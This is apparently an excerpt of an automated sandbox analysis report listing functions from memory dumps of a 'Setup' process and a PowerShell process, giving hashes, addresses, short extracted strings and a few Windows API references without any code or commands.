Instruction ID: 82bbf696a019e70f43be7045855eb6bffa92b7fec47e6a28aecdd6492962ff86
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 423181B4E00209DFCB08CF98C594AAEBBB1FF48314F248599D815AB345D335AE86DF94

Function 03203130 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: ab54d1d251eb6faaed7615440107f41cb5e3d444917c91a2108ad49a741c2fe6
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4911A037A291D50AC316CD3CC8005A5FFA20AAB935B1D8399E5B89B2D3D62289CE8354

Function 00FB495C Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d8bf313d4eb7f0238826e9552d78faa89106c39930148cbdd7b6d177422e3ca4
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 0711E533A451D00EC3168D3D85405A6BFA31AE7234B698399F4F89B2D3C6229D8EA765

Function 031F8930 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1b13e67950e77c1286a3f8d35eca5668d78a2291598a558b749e9846222873
Instruction ID: 5b75bc6714b5fd4f2707b8720070f2a6d6b81eeab29d07831cd1daf49358b361
Opcode Fuzzy Hash: 2f1b13e67950e77c1286a3f8d35eca5668d78a2291598a558b749e9846222873
Instruction Fuzzy Hash: F2017CFA6003015BDF20EE54D4C0B3BF2A97FC9604F1C442CDA495B641EB75E815C6A2

Function 00FAA15C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca27d80bb77d6f41407c7929366d07a0e1ee7ff0683ac23e858ba0514df5e08
Instruction ID: d5193c467626ea75b397e84fcc602c05e71c2ad168e8a9f7887dcb83e7bcb918
Opcode Fuzzy Hash: eca27d80bb77d6f41407c7929366d07a0e1ee7ff0683ac23e858ba0514df5e08
Instruction Fuzzy Hash: 3D0121F1A1030167DB21AE548CC173BB7A9AF96714F1C442CE90957301EB79EC1DEB96

Function 031F9B3C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0a8949e506bce0c0e1356fbdf86d2c7b1f9611ef4437ba73e13211d87aa105
Instruction ID: 279c764ba27ad8b06db49d8e7a21100c2d94a8f8cad386851801d70b0e9b7742
Opcode Fuzzy Hash: 7b0a8949e506bce0c0e1356fbdf86d2c7b1f9611ef4437ba73e13211d87aa105
Instruction Fuzzy Hash: 6D118E349042A18FCB28FE24C821FB7B3A2DFEF344B1C0469DA86CB349D319C449C691

Function 031D2BA0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43b2c0822c784eb56ef51b4c312873adb8949fdd51449810541a9a89e677059
Instruction ID: 948b0ed188909618597864d9e21d29e967dfecd956c65ad480e4085a4229cb88
Opcode Fuzzy Hash: b43b2c0822c784eb56ef51b4c312873adb8949fdd51449810541a9a89e677059
Instruction Fuzzy Hash: 75F0F63A7586150BE310DC69ECC496BF3A6EBCF248B1D8A38E591D3305C679E8078290

Function 00F843CC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e17b46b8b93681940eb964b697051b25580617ca7e158580fce7974d985bb66
Instruction ID: 0b112f0790dae2cd1be4deacf5251681a05599f80c7fc87294c6e595ee0b1c00
Opcode Fuzzy Hash: 8e17b46b8b93681940eb964b697051b25580617ca7e158580fce7974d985bb66
Instruction Fuzzy Hash: 5DF0F63BB552260BE310ED66ECC0EABB396EBC5218B189138E945D3705C435F806A3A0

Function 031F6C95 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e8eee9ed5d46ac8b24442d4f187d151acae7ac718d387ffc21681d61d4ac69
Instruction ID: 8737352c28301e294cb28d5d17a8b3b4ed303a261fe3f1bcdfa0fbaf94625ea9
Opcode Fuzzy Hash: a3e8eee9ed5d46ac8b24442d4f187d151acae7ac718d387ffc21681d61d4ac69
Instruction Fuzzy Hash: F7018BB290C3808BD714CF25C880A1BBBE6EBAA218F046E5CE48597615D371C9058B8A

Function 00FA84C1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febd845d7fbc1560b30782dc8a908ad84e660151c74c2555bcc22d68c84ce4d3
Instruction ID: b68f6276dd99fa714a192a29a9c96b7585e86975002a505d1470495704fcace0
Opcode Fuzzy Hash: febd845d7fbc1560b30782dc8a908ad84e660151c74c2555bcc22d68c84ce4d3
Instruction Fuzzy Hash: 79018BB190C3808BD704CF25C880A5BBBE5EBAA218F086A2CE48597611D375C9068F8B

Function 0320AF20 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b9f7cef55b576c5769ff0b0f7b3136f15f44c43bf993886976f35aa554485d
Instruction ID: 4a4c050c5bdb667c69f98c89466ef4d6c56d97aa15c5094dd01e3ae05dc5270d
Opcode Fuzzy Hash: e7b9f7cef55b576c5769ff0b0f7b3136f15f44c43bf993886976f35aa554485d
Instruction Fuzzy Hash: 95F05920A992848BC30C9E31A8A14BA7BB5EBC7644F18816EE4C353345D6298845CB36

Function 00FBC74C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a28e092b65ff540d28a50155b7a14f39c29ff7934229107a3a12203bf757103
Instruction ID: 7ded96d9a8db6c5c53e06cfb6d2ba5b3a9eb8f44a36d146125848ff94bc94cd8
Opcode Fuzzy Hash: 2a28e092b65ff540d28a50155b7a14f39c29ff7934229107a3a12203bf757103
Instruction Fuzzy Hash: C3F05924A892808BC70C9F319CA14BB7BB5EB87A04F04412DE4C353341D6288815CB3A

Function 00F80D1F Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 4ae7c617469d6c77cd664b06c5a818274b33fbd937c46910202dd7a9de62a3bb
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: F001FB35A01508EFCB54EF98C584AACF7B1FB44320F608699D8055B395CB31BF85EB40

Function 031E8C47 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633b47e7a1c267c76c30b50308ae3a17837702a15fbf472cd44302d2107c9699
Instruction ID: 1e7ed914e4e5e77c2b1565b172976b102ae4195873de39be1773c6871b1b653c
Opcode Fuzzy Hash: 633b47e7a1c267c76c30b50308ae3a17837702a15fbf472cd44302d2107c9699
Instruction Fuzzy Hash: 16F0A77590431ADFCB209F50C841AA7B7F1FF4AB50F049456F8895B220E331C951DB51

Function 00F9A473 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1049ae9babb13462fe44cc634d3d33307941569041ce766013df962ec1b4ad6a
Instruction ID: 298e24549a57d4cd1c6395e503c0cfbed899af292b546c5a3f057e67212710db
Opcode Fuzzy Hash: 1049ae9babb13462fe44cc634d3d33307941569041ce766013df962ec1b4ad6a
Instruction Fuzzy Hash: CEF08C71900206DFCF219F44C845AA7BBB1FF49760F00845AF8899B230E374C960EB96

Function 00F8BBC8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293cf65d0496148bedda2d5ee0e6efee0f8d1c1cce51e9cafa164afeb48d2f28
Instruction ID: e239a55355a1486f65bed95a596647af7d834bde5748c0d76d8bf0fce1a74c79
Opcode Fuzzy Hash: 293cf65d0496148bedda2d5ee0e6efee0f8d1c1cce51e9cafa164afeb48d2f28
Instruction Fuzzy Hash: 36F06D38E401158BC7189F18C8622B2B3B2EF8B351B18A466D542DB728E77C9846D348

Function 031DBE22 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 645b4fb7cd623ecb998cbf646c662a80247a3079372c3a280c463642203076dd
Instruction ID: a003aa13878d6afd6c5495719cf4f1af6db66ee5fb2bc1a22eb257ebea277844
Opcode Fuzzy Hash: 645b4fb7cd623ecb998cbf646c662a80247a3079372c3a280c463642203076dd
Instruction Fuzzy Hash: 68C08C38A0C140CBD304EE08F051B31B3F4A73720AF11B61CC282E3392CA75F4608B09

Function 00F8D64E Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334d6e4c3943ef95b73ff6a5b66c52bb1a96d6ad7b51dcfe65c98a45960ad9f5
Instruction ID: 916c9a9cfda63af83d54c0006b6bb9d6178873750755e61ca1286201313e3bc0
Opcode Fuzzy Hash: 334d6e4c3943ef95b73ff6a5b66c52bb1a96d6ad7b51dcfe65c98a45960ad9f5
Instruction Fuzzy Hash: 68C04C7CA4C144CBC705EF18E851B31BBF4A72724AF15356CD196E73B2C621E4908B1D

Function 031F79DC Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85698c552d6207b546a44012630d592bb4a438aa7125b244df4cf9af1d0fca57
Instruction ID: 7eaa0bb8040676b33d00adfa30e6f0960903decf39f91243390890e606131940
Opcode Fuzzy Hash: 85698c552d6207b546a44012630d592bb4a438aa7125b244df4cf9af1d0fca57
Instruction Fuzzy Hash: 87B012BAE0410087CE01EE00F901479F336571F101F10B020C008B7555DB21DD20860A

Function 00FA9208 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c340a932ba35376cde1bc8ac8a86423a7d80cb31c27f54effc6cc80f2d7bb414
Instruction ID: 88a7203fd35d607a080b2ca9e60e490fcb4ec22f85094517d31a37180516fd4d
Opcode Fuzzy Hash: c340a932ba35376cde1bc8ac8a86423a7d80cb31c27f54effc6cc80f2d7bb414
Instruction Fuzzy Hash: FCB012B1C1800087CE01EF40DC424BDF374570B302F187030D008B3121D631DA24970E

Function 031F6C90 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ec26192e3bddd47f93a05481eef0bf674aa9a98604e8e05e9f28422def00c0
Instruction ID: 354ce0ee75affab457c38fe2723f8242268bb4929d850cc9eb2499e8605ce51e
Opcode Fuzzy Hash: 26ec26192e3bddd47f93a05481eef0bf674aa9a98604e8e05e9f28422def00c0
Instruction Fuzzy Hash: 50A00268D48140CF9104DD04E554871E27A761F105F217500924AF7516E750E944870C

Function 00FA84BC Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d329d514cb0f3958576ae7273cfec8d0b62196dc83ab1d01189bb34e7847925
Instruction ID: 371a080648801efbc0996441d6856ac3ebf2400528bc8d738176af066bddc07a
Opcode Fuzzy Hash: 0d329d514cb0f3958576ae7273cfec8d0b62196dc83ab1d01189bb34e7847925
Instruction Fuzzy Hash: 64A00269D5C5408EC600CF04D454BB0E279A20F652F643510940AF7122C690E605A74C

Function 03200893 Relevance: 56.1, APIs: 1, Strings: 31, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 032008FE

Strings

?, xrefs: 03200A07
J, xrefs: 03200ACF
Z, xrefs: 03200A4F
R, xrefs: 03200A8F
I, xrefs: 03200967
7, xrefs: 03200A17
V, xrefs: 03200AAF
P, xrefs: 03200A7F
k, xrefs: 03200987
E, xrefs: 032009B7
p, xrefs: 03200917
N, xrefs: 03200AEF
O, xrefs: 03200AF7
V, xrefs: 032009D7
0, xrefs: 03200B89
\, xrefs: 03200A5F
Q, xrefs: 03200A37
V, xrefs: 032009C7
^, xrefs: 03200A6F
H, xrefs: 03200ABF
s, xrefs: 032009A7
@, xrefs: 03200AFF
{, xrefs: 03200937
x, xrefs: 03200957
<, xrefs: 03200A27
X, xrefs: 03200A3F
L, xrefs: 03200ADF
|, xrefs: 03200947
n, xrefs: 032009F7
T, xrefs: 03200A9F
@, xrefs: 03200927

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: AllocString
String ID: 0$7$<$?$@$@$E$H$I$J$L$N$O$P$Q$R$T$V$V$V$X$Z$\$^$k$n$p$s$x${$|
API String ID: 2525500382-1598773680
Opcode ID: 294d16efcb8789a2d734f31a33641358239bf86eea02dd56705e09b6e8228d5c
Instruction ID: 25c18678aa9af8b11a9bf99571b8a89e523f43981e35c43632bc9fc95af75a58
Opcode Fuzzy Hash: 294d16efcb8789a2d734f31a33641358239bf86eea02dd56705e09b6e8228d5c
Instruction Fuzzy Hash: 3581C22110CBC28EE332C63C885879BBED15BA7224F484B9DD1ED4B2E2C7B5454A8767

Function 031FFD59 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 82COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 031FFD63

Strings

e, xrefs: 031FFDD0
j, xrefs: 031FFDE9
g, xrefs: 031FFDDA
k, xrefs: 031FFDEE
,, xrefs: 031FFDC1
i, xrefs: 031FFDE4
c, xrefs: 031FFDC6
a, xrefs: 031FFDBC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitVariant
String ID: ,$a$c$e$g$i$j$k
API String ID: 1927566239-3852956744
Opcode ID: d7d9f45a21a229318fd8316565b1f63f0f6583058d573f191cad21d77a8f6ea3
Instruction ID: f9b7b956ae4c4726b9ffb5af0f99d5f3e34936ffcf523800807e384f6c319144
Opcode Fuzzy Hash: d7d9f45a21a229318fd8316565b1f63f0f6583058d573f191cad21d77a8f6ea3
Instruction Fuzzy Hash: D441683110C7C19AD315DB28849838BBFD25BE6318F088A9CE5E51B3D2C77585068BA7

Analysis Process: powershell.exePID: 6292, Parent PID: 7036COMMON

Executed Functions

Function 07DC1C10 Relevance: 5.6, Strings: 4, Instructions: 590COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC20B0
4'^q, xrefs: 07DC1F4E
4'^q, xrefs: 07DC20BA
4'^q, xrefs: 07DC1F58

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 56e637ea02eb9ffb947939f10a7f35eda96904ce30c0bcd8d7ab87f0e2d70e12
Instruction ID: 6046b5dcff9d84d960c5a86451d8d3f5c62a283dce40e9249aa225f3c72a9aaa
Opcode Fuzzy Hash: 56e637ea02eb9ffb947939f10a7f35eda96904ce30c0bcd8d7ab87f0e2d70e12
Instruction Fuzzy Hash: F5124BF2B0426A8FD715DB68981076AFBA6AFC2310F1480AED941CF256DF37D945C3A1

Function 052929F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2033527834.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479659b083acee48dfe8f30d1fdc6eb95e5490b0180b322ace5861d8b9f94ec6
Instruction ID: 7a3429f73baa5590e3e1825395f9a5bd33fbd10211e9d1bd96e8f3dcb27a950b
Opcode Fuzzy Hash: 479659b083acee48dfe8f30d1fdc6eb95e5490b0180b322ace5861d8b9f94ec6
Instruction Fuzzy Hash: AE917AB5A04245DFCB19CF58C4949BAFBB1FF48310B2585A9D819AB3A5C735FC41CBA0

Function 07DC1BF1 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66dd45760b2f872f1c367ed4795b943bedcd338dfabe2af3a3f7a6baceb0b197
Instruction ID: 7394b247e87ee6bc17ecd948f14ea49e8beb70a06be4d87ee24d54d229d8431b
Opcode Fuzzy Hash: 66dd45760b2f872f1c367ed4795b943bedcd338dfabe2af3a3f7a6baceb0b197
Instruction Fuzzy Hash: 0141D4F1A0422B9FDB15DA258941A69FBA6AF82314B18809DD9049F267DA37C980C7F1

Function 05294C20 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2033527834.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c09dc0b66eef5a41757c4778a1ccdb2f3e97e40084899cd2a86762cffaa61827
Instruction ID: d97f58906dbe129db8d33b42a33d1a1e4a2602128f4448c18e64851d252a78ff
Opcode Fuzzy Hash: c09dc0b66eef5a41757c4778a1ccdb2f3e97e40084899cd2a86762cffaa61827
Instruction Fuzzy Hash: B3416271A0E7D59FCB02DF6CC86099A7FB0EF4A200B1544DBD484DF2A3C625E849D7A5

Function 05292B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2033527834.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67afed221320ae49520ece5707375e5fa4f74a955fb91badb9fb039f9817ff7c
Instruction ID: b23380fa48b064753aafb5147d62891e2dba1aa90404a94a0790cdb49bd2f4f1
Opcode Fuzzy Hash: 67afed221320ae49520ece5707375e5fa4f74a955fb91badb9fb039f9817ff7c
Instruction Fuzzy Hash: 954105B4A14505AFCB09CF58C598EAABBB5FF48310B158199D815AB364C736FC51CFA0

Function 05294C1B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2033527834.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9447589f3b3cbcef6f0b54f6389daee5a2e1491900fc871cf438f5a8a262179f
Instruction ID: 0f8b5de177771f4be12e11acd063742d68b933fdc324e3bf1bc981d217dcefb1
Opcode Fuzzy Hash: 9447589f3b3cbcef6f0b54f6389daee5a2e1491900fc871cf438f5a8a262179f
Instruction Fuzzy Hash: 5E11C675A006199FCB04DF99D9809AABBB5FF89310B148599E909AB361C732FD41CBA0

Function 04DAD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2032861101.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4dad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987a42a7e78c14a432be4f8e747e57c37acbe8ec60c70bc0c8f77f8d5e11c00c
Instruction ID: 28562d2b03c61b4c0ba75287a0e7124aa2683b49e39c97edbd6d2d25697d9129
Opcode Fuzzy Hash: 987a42a7e78c14a432be4f8e747e57c37acbe8ec60c70bc0c8f77f8d5e11c00c
Instruction Fuzzy Hash: 700126712083409AE7208F29ED84B67BFDAEF41724F18C42AEC480B646C679E841C6B5

Function 04DAD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2032861101.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4dad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce614b014c55aa1f9bb25ec40d0148d88bf1741244a5ba892664f8a82227662
Instruction ID: 249faee219f95157b5c65d558896a1f2e4d1700157e1c4c84aa720482460cb92
Opcode Fuzzy Hash: cce614b014c55aa1f9bb25ec40d0148d88bf1741244a5ba892664f8a82227662
Instruction Fuzzy Hash: 77015E6210E3C09ED7128B259994B56BFB4EF53224F1DC0DBD8888F5A7C2699849C772

Non-executed Functions

Function 07DC04E0 Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC06F4
$^q, xrefs: 07DC06E8
tP^q, xrefs: 07DC0739
k, xrefs: 07DC0797
4'^q, xrefs: 07DC05E3
tP^q, xrefs: 07DC072D
$^q, xrefs: 07DC06C2
#j, xrefs: 07DC05AF
4'^q, xrefs: 07DC05EF
k, xrefs: 07DC07A5

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$#j$$^q$$^q$$^q$k$k
API String ID: 0-2299674365
Opcode ID: 45355843a35637ff68e3695cb02a2deb8f03a9bafcb96d7e80d1d7e315115890
Instruction ID: a0c05907d2d7340af8d597ee0322dd894d7ee3f720ce1da6116650b40f6b9fe1
Opcode Fuzzy Hash: 45355843a35637ff68e3695cb02a2deb8f03a9bafcb96d7e80d1d7e315115890
Instruction Fuzzy Hash: 44A148B2714357CFC7258A699C1067AFBE5AFC6210F2880AFD585CB3A1DA36C845C7E1

Function 07DC1270 Relevance: 11.5, Strings: 9, Instructions: 267COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC14E1
$^q, xrefs: 07DC12A8
k, xrefs: 07DC1357
4'^q, xrefs: 07DC14D7
$^q, xrefs: 07DC12B4
k, xrefs: 07DC1365
tP^q, xrefs: 07DC12F9
$^q, xrefs: 07DC1282
tP^q, xrefs: 07DC12ED

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$k$k
API String ID: 0-3414475174
Opcode ID: 5ff473d91726b61630faaff410d45e2d2cf1cf56d59949b697bee514b425184e
Instruction ID: 0e454c024013d40c43f08f41502b3484a0ef64a56cfbdd462445c12ce1080e9d
Opcode Fuzzy Hash: 5ff473d91726b61630faaff410d45e2d2cf1cf56d59949b697bee514b425184e
Instruction Fuzzy Hash: 619138F271426ACFC715CA78940466AFBF2AF82610F1884AED545CF263DA37DC45C7A1

Function 07DC0308 Relevance: 6.3, Strings: 5, Instructions: 62COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC02F7
4'^q, xrefs: 07DC0373
$^q, xrefs: 07DC035E
$^q, xrefs: 07DC0352
4'^q, xrefs: 07DC037F

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-2831958266
